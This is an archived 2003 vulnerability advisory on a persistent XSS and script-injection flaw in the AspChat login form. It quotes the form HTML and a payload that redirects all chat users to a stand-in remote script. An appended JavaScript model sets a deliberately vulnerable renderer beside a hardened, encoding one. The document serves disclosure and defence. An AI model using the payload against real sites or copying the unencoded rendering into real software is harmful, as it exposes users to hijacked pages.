lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <Law11-OE23dsTgDO4W50004690a@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Asp Chat - .ASP XSS / JS Injection

------------------------------------------------------------------
- EXPL-A-2003-008 exploitlabs.com Advisory 008
------------------------------------------------------------------

-= Asp Chat ( chat.asp ) =-

morning_wood
June 16, 2003
exploitlabs.com

Vulnerability(s):
-----------------
1. .ASP XSS / JS Injection
   (a lot more, I'm sure...)

Product:
--------
AspChat
http://www.123apps.net/page.asp?page=aspchat

Description of product:
-----------------------
ASP Chat - Freeware
"Web based chat application with user friendly interface. Easy to install
just copy to your folder where you want to use it. No database and no
components needed. Download and use it for free."

Download:
http://download.123apps.net/files/aspchat.zip  <-- doesn't work
http://www.zone-h.org/download/file=2848/

VULNERABILITY / EXPLOIT
=======================

Remote:
-------
yup

exploit code here... ( not really needed but it shows the basic flaw )

This is a direct rip of the login page, at
http://www.123apps.net/demo/aspchat/

------------ snippy -------------------
<body bgcolor="#FFCC99" topmargin="5">
<center>
<font face='verdana,arial' size='2'>Type nickname
<form action='chat.asp?event=login' method='post'>
<input type='text' name='login' size='10'>
<input type='submit' value='Enter'>
</form>
<hr size='1'>
ASP Chat by <a href='mailto:info@...apps.net'>123apps.net</a>
----------- end snippy ---------------

As the snippet shows, there is no length check (or any other validation)
on the login field: size='10' only sets the width of the text box. The
login name (or the script from the PoC) is "pushed" into the chat as the
user name and rendered as-is, giving XSS and remote includes by way of

<SCRIPT>location.href="http://example.com/remote-nasty-script.ext";</SCRIPT>

or whatever you have. All users currently logged in, and any who log in
later, are affected, since the injected name is persistent, as
http://www.123apps.net/demo/aspchat/ or
http://www.123apps.net/demo/aspchat/chat.asp shows.

The depth of this has not been fully exploited; I leave it to the vendor
to fix ASAP. Oh... you can chat normally and then decide to "throw" URLs
or bad JS at people... I got bored real fast with that.

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
info@...apps.net - Concurrent with this advisory

Credits:
--------
morning_wood
http://exploitlabs.com
"we're finding your holes"
morning_wood@...me4.com - get tested

----------------------------------------
be a good vendor... test your products first, it is your problem, fix it.

http://nothackers.org - it's t0day
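The flaw the advisory describes, modelled as an added example (this is not code from the advisory, nor AspChat's own chat.asp, whose source is not on this page): a nickname posted to the login form is stored and concatenated into the chat HTML with no server-side validation and no encoding, so script in a nickname runs for every user who loads the page. The vulnerable renderer is shown beside a hardened one that enforces the length limit the form only hints at and HTML-encodes every untrusted field at output time. Function names, the in-memory room store, the 10-character limit and the nickname allow-list are assumptions made for the illustration; the classic ASP equivalent of the encoder below is the built-in Server.HTMLEncode.

```javascript
// Added example, not code from the advisory or from AspChat itself.
// Models chat.asp?event=login: the submitted nickname is stored and later
// rendered for every viewer. Names, room store and limits are assumptions.

// Nickname payload quoted in the advisory (closing quote added).
const PAYLOAD =
  '<SCRIPT>location.href="http://example.com/remote-nasty-script.ext";</SCRIPT>';

// --- Vulnerable behaviour: what the advisory describes -----------------------

// No validation: whatever was typed into the login form is accepted.
function acceptAnyNick(nick) {
  return typeof nick === "string" && nick.length > 0 ? nick : null;
}

// Raw concatenation into HTML; markup in nick or msg is rendered as markup.
function renderLineVulnerable(nick, msg) {
  return "<b>" + nick + "</b>: " + msg + "<br>";
}

// --- Hardened behaviour -------------------------------------------------------

// size='10' on the form is only a display hint, so the limit is enforced here,
// server-side. The allow-list keeps nicknames to characters that need no
// encoding, but output is still encoded: a length cap alone would not stop a
// short payload.
const MAX_NICK = 10;
const NICK_RE = /^[A-Za-z0-9_-]+$/;

function validateNick(nick) {
  if (typeof nick !== "string") return null;
  const n = nick.trim();
  if (n.length === 0 || n.length > MAX_NICK || !NICK_RE.test(n)) return null;
  return n;
}

// Minimal HTML entity encoder (classic ASP: Server.HTMLEncode).
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]
  );
}

// Encode at the point of output, for every untrusted field, not just the nick.
function renderLineSafe(nick, msg) {
  return "<b>" + htmlEncode(nick) + "</b>: " + htmlEncode(msg) + "<br>";
}

// --- Chat room model (assumed) ----------------------------------------------

// Lines are persisted server-side and re-rendered for every viewer, which is
// why the injection is persistent: it fires for anyone who loads the page later.
function makeRoom(validate, render) {
  const lines = [];
  return {
    // POST chat.asp?event=login: returns true if the nickname was accepted.
    login(nick) {
      const n = validate(nick);
      if (n === null) return false;
      lines.push({ nick: n, msg: "has entered the chat" });
      return true;
    },
    say(nick, msg) {
      lines.push({ nick, msg });
    },
    // GET chat.asp: the page every user sees.
    page() {
      return lines.map((l) => render(l.nick, l.msg)).join("\n");
    },
  };
}

// Detection check: does the rendered page still contain a live <script> tag?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run both rooms against the same input and report whether the payload survived.
function demo() {
  const vuln = makeRoom(acceptAnyNick, renderLineVulnerable);
  vuln.login(PAYLOAD);
  vuln.say("alice", "hello <everyone>");

  const safe = makeRoom(validateNick, renderLineSafe);
  const accepted = safe.login(PAYLOAD);
  safe.login("alice");
  safe.say("alice", "hello <everyone>");

  return {
    vulnerableInjected: containsRawScriptTag(vuln.page()),
    safePayloadAccepted: accepted,
    safeInjected: containsRawScriptTag(safe.page()),
    safePage: safe.page(),
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

Run with `node` to see the two rendered pages side by side. The point of encoding at output rather than relying on the nickname allow-list is that chat messages, which the advisory also notes can carry "bad JS", go through the same renderer: any field that reaches the page untrusted is encoded there, whatever validation happened at login.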